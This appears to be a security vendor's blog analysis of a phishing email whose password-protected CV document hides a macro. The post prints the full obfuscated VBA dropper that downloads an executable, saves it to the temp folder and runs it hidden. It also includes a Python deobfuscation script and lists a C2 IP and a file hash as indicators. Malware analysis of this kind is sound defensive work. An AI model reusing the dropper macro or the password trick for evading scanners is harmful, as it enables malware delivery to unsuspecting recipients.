Malicious Activity: Would You Hire a Hacker?

Would you? The HR department of one of our clients received an email with a CV attached. The email said the attached Word document was password protected and supplied the password in the message body. A user has to type that password by hand, which is exactly the point: an automated system that scans attachments for malicious content cannot open the document without the password, so it never gets to inspect the macros inside.

Once the user enters the password, the file turns out to be a familiar attack: a malicious macro that runs as soon as the document opens and executes commands on the host. The macro itself is obfuscated as well, with its key strings assembled from character codes at run time, which makes signature-based detection harder still.

Perception Point's file decryption feature extracted the macro from the password-protected file. The code downloads a malicious executable from a remote server, saves it to the user's temp folder, and runs it.

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Runs automatically as soon as the document is opened (i.e. right after the password is entered).
Private Sub Document_Open()
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")

    ' Synchronous GET of the payload; the .jpg name disguises an executable.
    WinHttpReq.Open "GET", "http://X.X.X.X/troll1.jpg", False, "username", "password"
    WinHttpReq.send

    ' "ADODB.Stream" is assembled from character codes so the string never appears in the file.
    Dim first5 As String
    Dim second5 As String
    Dim last5 As String
    first5 = ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101) ' "ADODB.Stre"
    second5 = ChrW(97) & ChrW(109) ' "am"
    last5 = first5 + second5       ' "ADODB.Stream"
    xyuhjnx = WinHttpReq.responseBody ' junk assignment, never used
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject(last5)
        oStream.Open
        oStream.Type = Val("1FFF") ' Val() stops at the first non-digit, so this is 1 = adTypeBinary
        oStream.Write WinHttpReq.responseBody

        ' Decoy: builds the string "\check.exe" but never uses it.
        Dim first6 As String
        Dim last6 As String
        first6 = ChrW(92) & ChrW(99) & ChrW(104) & ChrW(101) & ChrW(99) & ChrW(107) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101)
        last6 = first6

        ' Val("2FFF") = 2 = adSaveCreateOverWrite: drop the payload into %TEMP%.
        oStream.SaveToFile Environ("Temp") + "\qwerty2.exe", Val("2FFF")
        oStream.Close

    End If

    ' Launch the dropped file with a hidden window (0 = vbHide).
    ' Note this sits outside the If block, so it is attempted even when the download failed.
    Call Shell(Environ("Temp") + "\qwerty2.exe", 0)
End Sub
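The obfuscation above is shallow once you know the two tricks: strings are built from ChrW() character codes and the ADODB constants are hidden behind Val("1FFF")-style calls, which VBA evaluates by reading only the leading digits. The following Python is an added analysis example, not Perception Point's code or tooling: it folds those tricks back into plain literals, resolves the string variables the macro concatenates, and then pulls the download URL, COM object, dropped path and executed command out of the cleaned listing. The SAMPLE_MACRO text is constructed from the string-building lines of the listing above, with the server address kept as X.X.X.X exactly as the write-up prints it; the function names are this example's own.

```python
"""Deobfuscate the string-building tricks used by the macro above.

Added example (not Perception Point's code): folds runs of ChrW(n) into
string literals, evaluates Val("...") the way VBA does (leading numeric
prefix only), and resolves string variables built by concatenation.
"""
import re

# Constructed sample: the string-building lines from the macro listing above,
# with the server address left as X.X.X.X exactly as the write-up prints it.
SAMPLE_MACRO = r'''
WinHttpReq.Open "GET", "http://X.X.X.X/troll1.jpg", False, "username", "password"
first5 = ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101)
second5 = ChrW(97) & ChrW(109)
last5 = first5 + second5
Set oStream = CreateObject(last5)
oStream.Type = Val("1FFF")
first6 = ChrW(92) & ChrW(99) & ChrW(104) & ChrW(101) & ChrW(99) & ChrW(107) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101)
last6 = first6
oStream.SaveToFile Environ("Temp") + "\qwerty2.exe", Val("2FFF")
Call Shell(Environ("Temp") + "\qwerty2.exe", 0)
'''

# A run of Chr/ChrW/ChrB(n) calls joined by & or +.
CHR_RUN = re.compile(r'Chr[WB]?\(\s*\d+\s*\)(?:\s*[&+]\s*Chr[WB]?\(\s*\d+\s*\))*')
CHR_CODE = re.compile(r'Chr[WB]?\(\s*(\d+)\s*\)')
VAL_CALL = re.compile(r'Val\(\s*"([^"]*)"\s*\)')
ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
STR_LIT = re.compile(r'^"((?:[^"]|"")*)"$')
# Tokens of a concatenation expression: quoted literals or bare operands.
CONCAT_TOKEN = re.compile(r'"(?:[^"]|"")*"|[^"&+\s]+')


def vba_literal(value):
    """Render a Python string as a VBA string literal (quotes are doubled)."""
    return '"' + value.replace('"', '""') + '"'


def fold_chr(line):
    """Replace every ChrW(n) & ChrW(m) ... run with the literal it builds."""
    def run_to_literal(m):
        codes = CHR_CODE.findall(m.group(0))
        return vba_literal(''.join(chr(int(c)) for c in codes))
    return CHR_RUN.sub(run_to_literal, line)


def vba_val(text):
    """Mimic VBA Val(): return the leading numeric prefix, or '0' if none.
    Simplification: the &H (hex) and &O (octal) prefixes are not handled."""
    m = re.match(r'\s*[-+]?\d+(?:\.\d+)?', text)
    return m.group(0).strip() if m else '0'


def fold_val(line):
    """Replace Val("1FFF")-style calls with the number VBA would produce."""
    return VAL_CALL.sub(lambda m: vba_val(m.group(1)), line)


def substitute(text, known):
    """Replace already-resolved variable names with their string literals.
    Simplification: names inside string literals are not protected."""
    for name, value in known.items():
        # A callable replacement keeps backslashes in the value from being read as escapes.
        text = re.sub(r'\b' + re.escape(name) + r'\b',
                      lambda _m, v=value: vba_literal(v), text)
    return text


def concat_value(rhs):
    """Resolve an RHS made only of string literals joined by & or +, else None."""
    parts = []
    for tok in CONCAT_TOKEN.findall(rhs):
        m = STR_LIT.match(tok)
        if not m:
            return None
        parts.append(m.group(1).replace('""', '"'))
    return ''.join(parts)


def deobfuscate(macro):
    """Return the macro lines with character-code strings, Val() tricks and
    string variables folded into plain literals."""
    known = {}   # variable name -> resolved string value
    out = []
    for raw in macro.strip().splitlines():
        line = fold_val(fold_chr(raw))
        m = ASSIGN.match(line)
        if m:
            rhs = substitute(m.group(2), known)
            line = '%s = %s' % (m.group(1), rhs)
            value = concat_value(rhs)
            if value is not None:
                known[m.group(1)] = value
        else:
            line = substitute(line, known)
        out.append(line)
    return out


def extract_iocs(lines):
    """Pull the download URL, COM objects, dropped path and executed command
    out of the deobfuscated listing."""
    text = '\n'.join(lines)
    return {
        'urls': re.findall(r'https?://[^\s"]+', text),
        'com_objects': re.findall(r'CreateObject\(\s*"([^"]+)"\s*\)', text),
        'dropped_files': re.findall(r'SaveToFile\s+(.+?),\s*\d+\s*$', text, re.M),
        'executed': re.findall(r'Shell\((.+?),\s*\d+\s*\)', text),
    }


if __name__ == '__main__':
    cleaned = deobfuscate(SAMPLE_MACRO)
    print('\n'.join(cleaned))
    for kind, values in extract_iocs(cleaned).items():
        print(kind, values)
```

In a real triage the macro text would come from olevba (oletools) after the document has been decrypted with the password quoted in the email, which is the step an automated scanner without that password cannot take. The cleaned output makes the behaviour obvious at a glance: CreateObject("ADODB.Stream"), binary stream type 1, a SaveToFile with overwrite mode 2 into %TEMP%\qwerty2.exe, and a Shell call on that path.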

IOCs

C2 server IP: 209.141.55.226
qwerty2.exe SHA-256: 2b5f43fdb4678f82874bbe424a60fde3ae547dd6697ef46d45febc17dfbef9b3 (VirusTotal score 12/69 as of 2019-02-21 15:13:33 UTC)

Learn more about how we protect our clients against malicious activity here.

Learn more about protecting your organization in our detailed guide to cyber security strategy.